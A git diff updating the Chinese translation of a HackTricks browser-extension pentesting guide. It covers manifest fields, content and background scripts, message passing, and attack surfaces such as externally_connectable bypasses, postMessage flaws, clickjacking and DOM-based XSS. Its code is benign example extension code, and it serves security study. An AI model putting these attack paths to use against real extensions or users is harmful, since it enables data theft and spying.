Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

This commit is contained in:
Translator 2024-07-19 15:59:20 +00:00
parent 5a6b15c8da
commit 8d69a1324f
114 changed files with 9410 additions and 8768 deletions

View file

@ -1,22 +1,23 @@
# 浏览器扩展渗透测试方法论
# Browser Extension Pentesting Methodology
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>Support HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## 基本信息
浏览器扩展是用JavaScript编写的并由浏览器在后台加载。它有自己的[DOM](https://www.w3schools.com/js/js\_htmldom.asp)但可以与其他网站的DOM进行交互。这意味着它可能会危及其他网站的机密性、完整性和可用性CIA
浏览器扩展是用 JavaScript 编写的,并在后台由浏览器加载。它有自己的 [DOM](https://www.w3schools.com/js/js\_htmldom.asp),但可以与其他网站的 DOM 进行交互。这意味着它可能会危害其他网站的机密性、完整性和可用性CIA
## 主要组件
@ -26,29 +27,29 @@
### **内容脚本**
每个内容脚本直接访问**单个网页的DOM**,因此容易受到**潜在恶意输入**的影响。但是,内容脚本除了能够向扩展核心发送消息外,不具备其他权限。
每个内容脚本可以直接访问 **单个网页** 的 DOM因此暴露于 **潜在的恶意输入**。然而,内容脚本除了能够向扩展核心发送消息外,没有其他权限。
### **扩展核心**
扩展核心包含大部分扩展权限/访问,但扩展核心只能通过[XMLHttpRequest](https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest)和内容脚本与Web内容进行交互。此外,扩展核心无法直接访问主机机器
扩展核心包含大部分扩展权限/访问,但扩展核心只能通过 [XMLHttpRequest](https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest) 和内容脚本与网页内容进行交互。此外,扩展核心无法直接访问主机。
### **本地二进制**
扩展允许本地二进制文件以用户的完整权限**访问主机机器**。本地二进制通过标准的Netscape插件应用程序编程接口[NPAPI](https://en.wikipedia.org/wiki/NPAPI)与扩展核心进行交互NPAPI被Flash和其他浏览器插件使用
扩展允许一个本地二进制文件,可以 **以用户的完全权限访问主机。** 本地二进制文件通过 Flash 和其他浏览器插件使用的标准 Netscape 插件应用程序编程接口 ([NPAPI](https://en.wikipedia.org/wiki/NPAPI)) 与扩展核心进行交互
### 边界
{% hint style="danger" %}
要获得用户的完整权限,攻击者必须说服扩展将内容脚本中的恶意输入传递给扩展核心,再从扩展核心传递给本地二进制。
要获得用户的完全权限,攻击者必须说服扩展将恶意输入从内容脚本传递到扩展核心,并从扩展核心传递到本地二进制。
{% endhint %}
扩展的每个组件之间由**强大的保护边界**分隔。每个组件在**单独的操作系统进程**中运行。内容脚本和扩展核心在**沙盒进程**中运行,无法访问大多数操作系统服务
扩展的每个组件之间由 **强保护边界** 隔离。每个组件在 **单独的操作系统进程** 中运行。内容脚本和扩展核心在 **沙箱进程** 中运行,这些进程对大多数操作系统服务不可用
此外,内容脚本通过**在单独的JavaScript堆中运行**与其关联的网页分离。内容脚本和网页具有**对同一底层DOM的访问权限**,但两者**不会交换JavaScript指针**从而防止JavaScript功能的泄漏
此外,内容脚本通过 **在单独的 JavaScript 堆中运行** 与其关联的网页分离。内容脚本和网页可以 **访问相同的底层 DOM**,但两者 **从不交换 JavaScript 指针**,防止 JavaScript 功能的泄露
## **`manifest.json`**
Chrome扩展只是一个带有[.crx文件扩展名](https://www.lifewire.com/crx-file-2620391)的ZIP文件夹。扩展的核心是位于文件夹根目录的**`manifest.json`**文件,该文件指定布局、权限和其他配置选项。
Chrome 扩展只是一个带有 [.crx 文件扩展名](https://www.lifewire.com/crx-file-2620391) ZIP 文件夹。扩展的核心是位于文件夹根目录的 **`manifest.json`** 文件,该文件指定布局、权限和其他配置选项。
示例:
```json
@ -83,7 +84,7 @@ Chrome扩展只是一个带有[.crx文件扩展名](https://www.lifewire.com/crx
```
### `content_scripts`
内容脚本在用户导航到匹配页面时加载,对于我们的情况是任何匹配`https://example.com/*`表达式但不匹配`*://*/*/business*`正则表达式的页面。它们像页面自己的脚本一样执行,并且可以任意访问页面的[文档对象模型DOM](https://developer.mozilla.org/en-US/docs/Web/API/Document_Object_Model)。
内容脚本在用户**导航到匹配页面**时**加载**,在我们的例子中,任何匹配**`https://example.com/*`**表达式且不匹配**`*://*/*/business*`**正则表达式的页面。它们**像页面自己的脚本**一样执行,并且对页面的[文档对象模型 (DOM)](https://developer.mozilla.org/en-US/docs/Web/API/Document\_Object\_Model)具有任意访问权限
```json
"content_scripts": [
{
@ -98,9 +99,9 @@ Chrome扩展只是一个带有[.crx文件扩展名](https://www.lifewire.com/crx
}
],
```
为了包含或排除更多的URL也可以使用**`include_globs`**和**`exclude_globs`**。
为了包含或排除更多的 URL您还可以使用 **`include_globs`** 和 **`exclude_globs`**。
以下是一个示例内容脚本,当使用[存储API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/storage)从扩展的存储中检索`message`值时,将在页面上添加一个解释按钮。
这是一个示例内容脚本,当使用 [存储 API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/storage) 从扩展的存储中检索 `message` 值时,将向页面添加一个解释按钮。
```js
chrome.storage.local.get("message", result =>
{
@ -115,26 +116,26 @@ document.body.appendChild(div);
```
<figure><img src="../../.gitbook/assets/image (23).png" alt=""><figcaption></figcaption></figure>
单击此按钮时,内容脚本通过利用[runtime.sendMessage() API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/runtime/sendMessage)向扩展页面发送消息。这是因为内容脚本在直接访问API方面存在限制`storage`是少数例外之一。对于超出这些例外的功能,消息将发送到内容脚本可以与之通信的扩展页面
点击此按钮时,通过利用 [**runtime.sendMessage() API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/runtime/sendMessage) 向扩展页面发送消息。这是由于内容脚本在直接访问 API 方面的限制,`storage` 是少数例外之一。对于超出这些例外的功能,消息会发送到扩展页面,内容脚本可以与之通信
{% hint style="warning" %}
根据浏览器的不同,内容脚本的功能可能略有不同。对于基于Chromium的浏览器功能列表可在[Chrome开发者文档](https://developer.chrome.com/docs/extensions/mv3/content_scripts/#capabilities)中找到而对于Firefox[MDN](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/Content_scripts#webextension_apis)是主要来源。\
值得注意的是,内容脚本可以与后台脚本通信,使其能够执行操作并传递响应。
根据浏览器的不同,内容脚本的能力可能会略有不同。对于基于 Chromium 的浏览器,能力列表可在 [Chrome Developers documentation](https://developer.chrome.com/docs/extensions/mv3/content\_scripts/#capabilities) 中找到,而对于 Firefox[MDN](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/Content\_scripts#webextension\_apis) 是主要来源。\
值得注意的是,内容脚本能够与后台脚本进行通信,使其能够执行操作并传递响应。
{% endhint %}
要在Chrome中查看和调试内容脚本可以从“选项”>“更多工具”>“开发者工具”或按Ctrl + Shift + I打开Chrome开发者工具菜单
要在 Chrome 中查看和调试内容脚本,可以通过选项 > 更多工具 > 开发者工具访问 Chrome 开发者工具菜单,或按 Ctrl + Shift + I
在显示开发者工具后,应单击**源标签**,然后单击**内容脚本**标签。这样可以观察来自各种扩展的运行内容脚本,并设置断点以跟踪执行流程。
当开发者工具显示后,点击 **Source tab**,然后点击 **Content Scripts** tab。这允许观察来自各种扩展的运行内容脚本,并设置断点以跟踪执行流程。
### 注入的内容脚本
{% hint style="success" %}
请注意**内容脚本不是强制性的**,也可以通过**动态注入**脚本并通过**`tabs.executeScript`**在网页中**以编程方式注入**它们。这实际上提供了更多**细粒度控制**
请注意**内容脚本不是强制性的**,也可以通过 **`tabs.executeScript`** **动态** **注入** 脚本并在网页中 **程序化地注入**。这实际上提供了更 **细粒度的控制**
{% endhint %}
要对内容脚本进行编程注入,扩展需要具有[主机权限](https://developer.chrome.com/docs/extensions/reference/permissions),以便将脚本注入到页面中。这些权限可以通过在扩展的清单中**请求**它们或通过[**activeTab**](https://developer.chrome.com/docs/extensions/reference/manifest/activeTab)临时获得
对于内容脚本的程序化注入,扩展需要对要注入脚本的页面具有 [host permissions](https://developer.chrome.com/docs/extensions/reference/permissions)。这些权限可以通过在扩展的清单中 **请求** 或通过 [**activeTab**](https://developer.chrome.com/docs/extensions/reference/manifest/activeTab) 临时获取
#### 示例基于activeTab的扩展
#### 示例 activeTab 基础扩展
{% code title="manifest.json" %}
```json
@ -155,7 +156,7 @@ document.body.appendChild(div);
```
{% endcode %}
* **点击时注入JS文件**
* **点击时注入一个JS文件**
```javascript
// content-script.js
document.body.style.backgroundColor = "orange";
@ -168,7 +169,7 @@ files: ["content-script.js"]
});
});
```
* **点击时注入函数**
* **在点击时注入一个函数**:
```javascript
//service-worker.js - Inject a function
function injectedFunction() {
@ -182,7 +183,7 @@ func : injectedFunction,
});
});
```
#### 具有脚本权限的示例
#### 示例与脚本权限
```javascript
// service-workser.js
chrome.scripting.registerContentScripts([{
@ -195,17 +196,19 @@ js : [ "contentScript.js" ],
// Another example
chrome.tabs.executeScript(tabId, { file: "content_script.js" });
```
### Content Scripts `run_at`
为了包含或排除更多的 URL您还可以使用 **`include_globs`** 和 **`exclude_globs`**。
`run_at`字段控制**何时将JavaScript文件注入到网页**中。首选和默认值为`"document_idle"`。
### 内容脚本 `run_at`
可能的值包括:
`run_at` 字段控制 **JavaScript 文件何时注入到网页中**。首选和默认值是 `"document_idle"`
- **`document_idle`**:尽可能早
- **`document_start`**:在`css`文件之后但在构建任何其他DOM或运行任何其他脚本之前。
- **`document_end`**在DOM完成后立即但在加载图像和框架等子资源之前。
可能的值有:
#### 通过`manifest.json`
* **`document_idle`**:尽可能地
* **`document_start`**:在任何 `css` 文件之后,但在构建任何其他 DOM 或运行任何其他脚本之前。
* **`document_end`**:在 DOM 完成后立即,但在子资源(如图像和框架)加载之前。
#### 通过 `manifest.json`
```json
{
"name": "My extension",
@ -230,18 +233,18 @@ runAt : "document_idle",
js : [ "contentScript.js" ],
}]);
```
### `背景`
### `background`
内容脚本发送的消息会被**背景页**接收背景页在协调扩展组件方面起着中心作用。值得注意的是背景页在整个扩展的生命周期中持续存在不需要直接用户交互以隐秘方式运行。它拥有自己的文档对象模型DOM可以实现复杂的交互和状态管理。
由内容脚本发送的消息由**背景页面**接收背景页面在协调扩展组件中发挥着核心作用。值得注意的是背景页面在扩展的整个生命周期中持续存在默默运行而无需直接用户交互。它拥有自己的文档对象模型DOM能够实现复杂的交互和状态管理。
**关键点**
**关键点**
* **背景页角色:** 充当扩展的神经中枢,确保扩展各部分之间的通信和协调。
* **持久性:** 它是一个始终存在的实体,对用户不可见但对扩展功能至关重要。
* **自动生成:** 如果未明确定义,浏览器将自动创建一个背景页。这个自动生成的页面将包括扩展清单中指定的所有背景脚本,确保扩展的背景任务无缝运行。
* **背景页面角色:** 作为扩展的神经中枢,确保扩展各部分之间的通信和协调。
* **持久性:** 它是一个始终存在的实体,对用户不可见但对扩展功能至关重要。
* **自动生成:** 如果未明确定义,浏览器将自动创建一个背景页面。这个自动生成的页面将包含扩展清单中指定的所有背景脚本,确保扩展的后台任务无缝运行。
{% hint style="success" %}
浏览器自动生成背景页(未明确声明时)的便利性确保了所有必要的背景脚本被集成和运行,简化了扩展的设置过程。
浏览器在自动生成背景页面(当未明确声明时)所提供的便利,确保所有必要的背景脚本都被集成并正常运行,从而简化了扩展的设置过程。
{% endhint %}
示例背景脚本:
@ -254,9 +257,9 @@ chrome.tabs.create({ url: "https://example.net/explanation" });
}
})
```
它使用[runtime.onMessage API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/runtime/onMessage)来监听消息。当接收到一个`"explain"`消息时,它使用[tabs API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs)在新标签页中打开一个页面。
它使用 [runtime.onMessage API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/runtime/onMessage) 来监听消息。当接收到 `"explain"` 消息时,它使用 [tabs API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs) 在新标签页中打开一个页面。
要调试后台脚本,您可以转到**扩展详细信息并检查服务工作者**,这将使用后台脚本打开开发者工具:
要调试后台脚本,您可以转到 **扩展详细信息并检查服务工作者,** 这将打开带有后台脚本的开发者工具:
<figure><img src="https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/browser-extension-pentesting-methodology/broken-reference" alt=""><figcaption></figcaption></figure>
@ -264,24 +267,24 @@ chrome.tabs.create({ url: "https://example.net/explanation" });
浏览器扩展可以包含各种类型的页面:
* **操作页面**在单击扩展图标时显示在**下拉菜单**中
* 扩展将在**新标签页中加载的页面**
* **选项页面**单击时显示在扩展顶部的页面。在我的情况下,我能够在`chrome://extensions/?options=fadlhnelkbeojnebcbkacjilhnbjfjca`或单击以下内容中访问此页面
* **操作页面** 在点击扩展图标时显示在 **下拉菜单中**
* 扩展将 **在新标签页中加载的页面**
* **选项页面**此页面在点击时显示在扩展顶部。在之前的清单中,我能够通过 `chrome://extensions/?options=fadlhnelkbeojnebcbkacjilhnbjfjca` 访问此页面或点击
<figure><img src="../../.gitbook/assets/image (24).png" alt="" width="375"><figcaption></figcaption></figure>
请注意,这些页面不像后台页面那样持久,因为它们根据需要动态加载内容。尽管如此,它们与后台页面共享某些功能:
* **与内容脚本通信:**与后台页面类似,这些页面可以从内容脚本接收消息,促进扩展内的交互。
* **访问扩展特定的API**这些页面可以全面访问扩展特定的API取决于为扩展定义的权限
* **与内容脚本的通信:** 类似于后台页面,这些页面可以接收来自内容脚本的消息,促进扩展内的交互。
* **访问扩展特定的 API** 这些页面享有对扩展特定 API 的全面访问,受扩展定义的权限限制
### `permissions`和`host_permissions`
### `permissions` & `host_permissions`
**`permissions`**和**`host_permissions`**是`manifest.json`中的条目,将指示浏览器扩展具有哪些权限(存储、位置...)以及在**哪些网页**中
**`permissions`****`host_permissions`** 是 `manifest.json` 中的条目,指示 **浏览器扩展具有哪些权限**(存储、位置等)以及 **在哪些网页上**
由于浏览器扩展可能具有如此**特权**,一个恶意的扩展或被入侵的扩展可能允许攻击者**以不同方式窃取敏感信息并监视用户**。
由于浏览器扩展可能具有如此 **特权**,恶意扩展或被攻击的扩展可能允许攻击者 **以不同方式窃取敏感信息并监视用户**
这些设置如何工作以及它们如何可能被滥用:
查这些设置如何工作以及它们如何被滥用:
{% content-ref url="browext-permissions-and-host_permissions.md" %}
[browext-permissions-and-host\_permissions.md](browext-permissions-and-host\_permissions.md)
@ -289,13 +292,13 @@ chrome.tabs.create({ url: "https://example.net/explanation" });
### `content_security_policy`
**内容安全策略**也可以在`manifest.json`中声明。如果定义了一个,它可能会**存在漏洞**
**内容安全策略** 也可以在 `manifest.json` 中声明。如果定义了内容安全策略,它可能是 **脆弱的**
浏览器扩展页面的默认设置相当严格:
```bash
script-src 'self'; object-src 'self';
```
有关CSP和潜在绕过方法的更多信息,请查看:
有关CSP和潜在绕过的更多信息请查看
{% content-ref url="../content-security-policy-csp-bypass/" %}
[content-security-policy-csp-bypass](../content-security-policy-csp-bypass/)
@ -303,7 +306,7 @@ script-src 'self'; object-src 'self';
### `web_accessible_resources`
为了让网页访问浏览器扩展的页面,例如一个`.html`页面,这个页面需要在`manifest.json`的**`web_accessible_resources`**字段中提及。\
为了让网页访问浏览器扩展的页面,例如一个`.html`页面,该页面需要在`manifest.json`的**`web_accessible_resources`**字段中提到。\
例如:
```javascript
{
@ -325,39 +328,39 @@ script-src 'self'; object-src 'self';
```
chrome-extension://<extension-id>/message.html
```
在公共扩展中,**扩展ID是可访问的**
在公共扩展中,**extension-id 是可访问的**
<figure><img src="../../.gitbook/assets/image (1194).png" alt="" width="375"><figcaption></figcaption></figure>
尽管如此,如果使用`manifest.json`参数**`use_dynamic_url`**,这个**ID可以是动态的**
不过,如果使用 `manifest.json` 参数 **`use_dynamic_url`**,则该 **id 可能是动态的**
{% hint style="success" %}
请注意,即使在这里提到了一个页面,由于**内容安全策略**的保护,可能会**防止点击劫持**。因此在确认可能存在点击劫持攻击之前您还需要检查它frame-ancestors部分)。
请注意,即使此处提到某个页面,它也可能由于 **内容安全策略****受到 ClickJacking 保护**。因此,在确认 ClickJacking 攻击是否可能之前您还需要检查它frame-ancestors 部分)。
{% endhint %}
允许访问这些页面会使这些页面**潜在易受点击劫持攻击**
允许访问这些页面使这些页面 **可能容易受到 ClickJacking 攻击**
{% content-ref url="browext-clickjacking.md" %}
[browext-clickjacking.md](browext-clickjacking.md)
{% endcontent-ref %}
{% hint style="success" %}
只允许这些页面由扩展加载而不是由随机URL加载可以防止点击劫持攻击。
仅允许这些页面由扩展加载,而不是由随机 URL 加载,可以防止 ClickJacking 攻击。
{% endhint %}
{% hint style="danger" %}
请注意,来自**`web_accessible_resources`**和扩展的其他页面也能够**联系后台脚本**。因此,如果其中一个页面容易受到**XSS**攻击,可能会打开更大的漏洞。
请注意,**`web_accessible_resources`** 中的页面和扩展的其他页面也能够 **联系后台脚本**。因此,如果这些页面中的一个容易受到 **XSS** 攻击,它可能会打开更大的漏洞。
此外,请注意,您只能在iframe中打开**`web_accessible_resources`**中指定的页面但是从新标签页中只要知道扩展ID就可以访问扩展中的任何页面。因此如果发现滥用相同参数的XSS即使页面未配置在**`web_accessible_resources`**中,也可能会被滥用。
此外,请注意,您只能在 iframe 中打开 **`web_accessible_resources`** 中指示的页面,但从新标签页可以访问扩展中的任何页面,只需知道扩展 ID。因此如果发现 XSS 利用相同参数,即使页面未在 **`web_accessible_resources`** 中配置,也可能被利用。
{% endhint %}
### `externally_connectable`
根据[**文档**](https://developer.chrome.com/docs/extensions/reference/manifest/externally-connectable)`"externally_connectable"`清单属性声明了**哪些扩展和网页可以通过[runtime.connect](https://developer.chrome.com/docs/extensions/reference/runtime#method-connect)和[runtime.sendMessage](https://developer.chrome.com/docs/extensions/reference/runtime#method-sendMessage)与您的扩展连接**
根据 [**文档**](https://developer.chrome.com/docs/extensions/reference/manifest/externally-connectable)`"externally_connectable"` 清单属性声明 **哪些扩展和网页可以通过** [runtime.connect](https://developer.chrome.com/docs/extensions/reference/runtime#method-connect) [runtime.sendMessage](https://developer.chrome.com/docs/extensions/reference/runtime#method-sendMessage) 连接到您的扩展
* 如果在您的扩展清单中**未**声明**`externally_connectable`**键,或者声明为**`"ids": ["*"]`****所有扩展都可以连接,但没有网页可以连接**。
* 如果指定了**特定的ID**,例如`"ids": ["aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"]`**只有这些应用程序**可以连接。
* 如果指定了**匹配项**这些Web应用程序将能够连接:
* 如果在扩展的清单中 **未声明 `externally_connectable`** 键或声明为 **`"ids": ["*"]`****所有扩展都可以连接,但没有网页可以连接**。
* 如果指定了 **特定 ID**,如 `"ids": ["aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"]`**只有这些应用程序**可以连接。
* 如果指定了 **匹配项**,这些网页应用将能够连接:
```json
"matches": [
"https://*.google.com/*",
@ -365,27 +368,27 @@ chrome-extension://<extension-id>/message.html
```
* 如果指定为空:**`"externally_connectable": {}`**,则没有应用程序或网页能够连接。
这里指定的**扩展和 URL 越少****攻击面就越小**。
这里指示的**扩展和URL越少****攻击面就越小**。
{% hint style="danger" %}
如果一个易受 XSS 或接管攻击的网页在 **`externally_connectable`** 中被指定,攻击者将能够直接向后台脚本发送消息,完全绕过内容脚本及其 CSP。
如果在**`externally_connectable`**中指示了**易受XSS或接管攻击的网页**,攻击者将能够**直接向后台脚本发送消息**,完全绕过内容脚本及其CSP。
因此,这是一个**非常强大的绕过方式**。
因此,这是一个**非常强大的绕过**。
此外,如果客户端安装了一个恶意扩展,即使它不被允许与易受攻击的扩展通信,它也可以在允许的网页中注入 XSS 数据,或者滥用 **`WebRequest`** 或 **`DeclarativeNetRequest`** API 来操纵针对特定域的请求,修改页面对 **JavaScript 文件** 的请求(请注意,目标页面上的 CSP 可能会阻止这些攻击)。这个想法来自[**这篇文章**](https://www.darkrelay.com/post/opera-zero-day-rce-vulnerability)。
此外,如果客户端安装了一个恶意扩展,即使它不被允许与易受攻击的扩展通信,它也可能在**允许的网页中注入XSS数据**,或滥用**`WebRequest`**或**`DeclarativeNetRequest`** API来操纵目标域上的请求改变页面对**JavaScript文件**的请求。请注意目标页面上的CSP可能会阻止这些攻击)。这个想法来自[**这篇文章**](https://www.darkrelay.com/post/opera-zero-day-rce-vulnerability)。
{% endhint %}
## 通信摘要
## 通信总结
### 扩展 <--> Web 应用程序
### 扩展 <--> WebApp
为了在内容脚本和网页之间进行通信,通常会使用消息传递。因此,在 Web 应用程序中,通常会找到对函数 **`window.postMessage`** 的调用,而在内容脚本中会找到类似 **`window.addEventListener`** 的监听器。但请注意,扩展也可以**与 Web 应用程序发送 Post Message 进行通信**(因此 Web 应该期望这种情况发生),或者只是让 Web 加载一个新脚本。
在内容脚本和网页之间,通常使用后续消息进行通信。因此,在网页应用程序中,您通常会找到对函数**`window.postMessage`**的调用,而在内容脚本中则有像**`window.addEventListener`**这样的监听器。然而,请注意,扩展也可以**通过发送Post Message与网页应用程序通信**(因此网页应该预期到这一点),或者只是让网页加载一个新脚本。
### 扩展内部
### 扩展内部
通常会使用函数 **`chrome.runtime.sendMessage`** 在扩展内部发送消息(通常由 `background` 脚本处理),为了接收和处理消息,会声明一个监听器调用 **`chrome.runtime.onMessage.addListener`**。
通常使用函数**`chrome.runtime.sendMessage`**在扩展内部发送消息(通常由`background`脚本处理),为了接收和处理它,声明一个监听器调用**`chrome.runtime.onMessage.addListener`**。
还可以使用 **`chrome.runtime.connect()`** 杻建立持久连接,而不是发送单个消息,可以使用它来**发送**和**接收** **消息**,就像下面的示例一样
也可以使用**`chrome.runtime.connect()`**来建立持久连接,而不是发送单个消息,可以用它来**发送**和**接收****消息**,如下例所示
<details>
@ -416,21 +419,21 @@ console.log("Content script received message from background script:", msg);
```
</details>
还可以通过从后台脚本发送消息到特定标签中的内容脚本,调用 **`chrome.tabs.sendMessage`**,需要指定要发送消息的**标签ID**
也可以从后台脚本向位于特定标签页中的内容脚本发送消息,调用 **`chrome.tabs.sendMessage`**,在此需要指明要发送消息的 **标签页ID**
### 从允许的 `externally_connectable` 到扩展程序
### 从允许的 `externally_connectable` 到扩展
`externally_connectable` 配置中允许的**Web应用程序和外部浏览器扩展程序**可以使用以下方式发送请求:
`externally_connectable` 配置中允许的 **Web 应用和外部浏览器扩展** 可以使用以下方式发送请求:
```javascript
chrome.runtime.sendMessage(extensionId, ...
```
需要提及**扩展ID**的地方。
需要提到**扩展 ID**的地方。
## Web **↔︎** 内容脚本通信
**内容脚本**运行的环境和主机页面存在的环境是相互**分离**的,确保**隔离**。尽管存在这种隔离,两者都能与页面的**文档对象模型DOM**进行交互,这是一个共享资源。为了使主机页面能够与**内容脚本**进行通信,或者间接地通过内容脚本与扩展进行通信,需要利用双方都可以访问的**DOM**作为通信渠道。
**内容脚本**操作的环境与主机页面存在**分离**,确保**隔离**。尽管存在这种隔离,双方都能够与页面的**文档对象模型 (DOM)** 进行交互,这是一个共享资源。为了使主机页面能够与**内容脚本**进行通信,或通过内容脚本间接与扩展进行通信,必须利用双方都可以访问的**DOM**作为通信通道。
### 发送消息
### 后续消息
{% code title="content-script.js" %}
```javascript
@ -461,15 +464,15 @@ window.postMessage(
```
{% endcode %}
安全的Post Message通信应检查接收到消息的真实性,可以通过以下方式进行检查:
安全的 Post Message 通信应检查接收到消息的真实性,可以通过以下方式进行检查:
- **`event.isTrusted`**:只有在事件由用户操作触发时才为True
- 内容脚本可能只有在用户执行某些操作时才期望收到消息
- **来源域**:可能只允许白名单中的域发送消息
- 如果使用正则表达式,请非常小心
- **来源**`received_message.source !== window` 可用于检查消息是否来自内容脚本正在监听的**同一窗口**。
* **`event.isTrusted`**:只有当事件是由用户操作触发时,这个值才为 True
* 内容脚本可能只在用户执行某些操作时才期待接收到消息
* **源域**:可能只允许来自白名单域的消息
* 如果使用正则表达式,请非常小心
* **来源**`received_message.source !== window` 可用于检查消息是否来自 **同一窗口**内容脚本正在监听的窗口
即使执行了上述检查,仍可能存在漏洞,请在以下页面检查**潜在的Post Message绕过**
即使执行了上述检查,仍可能存在漏洞,因此请检查以下页面 **潜在的 Post Message 绕过**
{% content-ref url="../postmessage-vulnerabilities/" %}
[postmessage-vulnerabilities](../postmessage-vulnerabilities/)
@ -477,7 +480,7 @@ window.postMessage(
### Iframe
另一种可能的通信方式是通过**Iframe URLs**,您可以在以下示例中找到
另一种可能的通信方式可能是通过 **Iframe URLs**,您可以在以下位置找到示例
{% content-ref url="browext-xss-example.md" %}
[browext-xss-example.md](browext-xss-example.md)
@ -485,9 +488,9 @@ window.postMessage(
### DOM
这并不是“确切地”一种通信方式,但是**web和内容脚本将可以访问web DOM**。因此,如果**内容脚本**从中读取一些信息,**信任web DOM**则web可能会**修改这些数据**因为不应信任web或者因为web容易受到XSS攻击从而**危及内容脚本**
这并不是“确切的”通信方式,但 **网页和内容脚本将可以访问网页 DOM**。因此,如果 **内容脚本** 从中读取某些信息,**信任网页 DOM**,网页可能会 **修改这些数据**(因为网页不应被信任,或因为网页易受 XSS 攻击)并 **危害内容脚本**
您还可以在以下示例中找到一个**基于DOM的XSS示例来危及浏览器扩展**
您还可以在以下位置找到 **基于 DOM 的 XSS 以危害浏览器扩展** 的示例
{% content-ref url="browext-xss-example.md" %}
[browext-xss-example.md](browext-xss-example.md)
@ -495,11 +498,11 @@ window.postMessage(
## 内容脚本 **↔︎** 后台脚本通信
内容脚本可以使用函数[**runtime.sendMessage()**](https://developer.chrome.com/docs/extensions/reference/runtime#method-sendMessage) **或** [**tabs.sendMessage()**](https://developer.chrome.com/docs/extensions/reference/tabs#method-sendMessage) 发送**一次性可序列化为JSON**的消息。
内容脚本可以使用 [**runtime.sendMessage()**](https://developer.chrome.com/docs/extensions/reference/runtime#method-sendMessage) **或** [**tabs.sendMessage()**](https://developer.chrome.com/docs/extensions/reference/tabs#method-sendMessage) 发送 **一次性 JSON 可序列化** 消息。
要处理**响应**,请使用返回的**Promise**。尽管出于向后兼容性考虑,仍然可以将**回调函数**作为最后一个参数传递。
要处理 **响应**,请使用返回的 **Promise**。尽管为了向后兼容,您仍然可以将 **回调** 作为最后一个参数传递。
从**内容脚本**发送请求如下所示
**内容脚本** 发送请求的方式如下:
```javascript
(async () => {
const response = await chrome.runtime.sendMessage({greeting: "hello"});
@ -507,7 +510,7 @@ const response = await chrome.runtime.sendMessage({greeting: "hello"});
console.log(response);
})();
```
从**扩展程序**(通常是**后台脚本**)发送请求。发送消息到所选标签中的内容脚本的示例:
从**扩展**发送请求(通常是**后台脚本**)。以下是如何向选定标签页中的内容脚本发送消息的示例:
```javascript
// From https://stackoverflow.com/questions/36153999/how-to-send-a-message-between-chrome-extension-popup-and-content-script
(async () => {
@ -517,7 +520,7 @@ const response = await chrome.tabs.sendMessage(tab.id, {greeting: "hello"});
console.log(response);
})();
```
在**接收端**,您需要设置一个[**runtime.onMessage**](https://developer.chrome.com/docs/extensions/reference/runtime#event-onMessage) **事件监听器**来处理消息。无论是来自内容脚本还是扩展页面,设置方式都是一样的。
在**接收端**,您需要设置一个 [**runtime.onMessage**](https://developer.chrome.com/docs/extensions/reference/runtime#event-onMessage) **事件监听器** 来处理消息。这在内容脚本或扩展页面中看起来是一样的。
```javascript
// From https://stackoverflow.com/questions/70406787/javascript-send-message-from-content-js-to-background-js
chrome.runtime.onMessage.addListener(
@ -530,41 +533,41 @@ sendResponse({farewell: "goodbye"});
}
);
```
所示示例中,**`sendResponse()`** 以同步方式执行。要修改`onMessage`事件处理程序以异步执行`sendResponse()`,必须加入`return true;`
突出显示的示例中,**`sendResponse()`** 是以同步方式执行的。要修改 `onMessage` 事件处理程序以异步执行 `sendResponse()`,必须加入 `return true;`
